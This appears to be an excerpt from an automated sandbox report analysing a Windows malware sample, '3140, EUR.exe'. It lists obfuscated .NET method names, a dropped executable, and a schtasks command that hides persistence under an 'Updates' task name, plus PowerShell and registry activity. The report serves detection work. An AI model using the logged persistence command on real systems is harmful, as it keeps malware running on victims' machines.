                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jDZx6yMTIJBBgdc5M9.csHigh entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, c43BOPb17cTkFlcAFvH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, JaiguuulGFOV4gjVP9.csHigh entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.csHigh entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IYkmttbvFwlONMhZ0Rx.csHigh entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, BNDjbyKEiDpGcvSWK6.csHigh entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, kBEQvpZQ0mEMjME0yK.csHigh entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, cxJt6jqq06XAko1daI.csHigh entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, a5HLPykg5ohEWJsiPN.csHigh entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, r35OtXmVa9mbccyjMN.csHigh entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IaNmoTU1Jas5HiM3Qc.csHigh entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, pnbAqGRE0nfnZVOLAq.csHigh entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DgRGmDbjU6lUJhfE0v8.csHigh entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.csHigh entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, clSYfYveg2noAM7P8e.csHigh entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, k9RBG6DgUfX4TknVHW.csHigh entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DZt0vvzJwZJilcpPKx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, okXpofgYeVULwIjxF3.csHigh entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, MU4Oupc1dL6Nvwl4EF.csHigh entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jHN6pNdJjWN1aRaPiD.csHigh entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jDZx6yMTIJBBgdc5M9.csHigh entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, c43BOPb17cTkFlcAFvH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, JaiguuulGFOV4gjVP9.csHigh entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.csHigh entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IYkmttbvFwlONMhZ0Rx.csHigh entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, BNDjbyKEiDpGcvSWK6.csHigh entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, kBEQvpZQ0mEMjME0yK.csHigh entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, cxJt6jqq06XAko1daI.csHigh entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, a5HLPykg5ohEWJsiPN.csHigh entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, r35OtXmVa9mbccyjMN.csHigh entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IaNmoTU1Jas5HiM3Qc.csHigh entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, pnbAqGRE0nfnZVOLAq.csHigh entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DgRGmDbjU6lUJhfE0v8.csHigh entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.csHigh entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, clSYfYveg2noAM7P8e.csHigh entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, k9RBG6DgUfX4TknVHW.csHigh entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DZt0vvzJwZJilcpPKx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, okXpofgYeVULwIjxF3.csHigh entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, MU4Oupc1dL6Nvwl4EF.csHigh entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jHN6pNdJjWN1aRaPiD.csHigh entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jDZx6yMTIJBBgdc5M9.csHigh entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, c43BOPb17cTkFlcAFvH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, JaiguuulGFOV4gjVP9.csHigh entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.csHigh entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IYkmttbvFwlONMhZ0Rx.csHigh entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, BNDjbyKEiDpGcvSWK6.csHigh entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, kBEQvpZQ0mEMjME0yK.csHigh entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, cxJt6jqq06XAko1daI.csHigh entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, a5HLPykg5ohEWJsiPN.csHigh entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
                    Source: C:\Users\user\Desktop\3140, EUR.exeFile created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
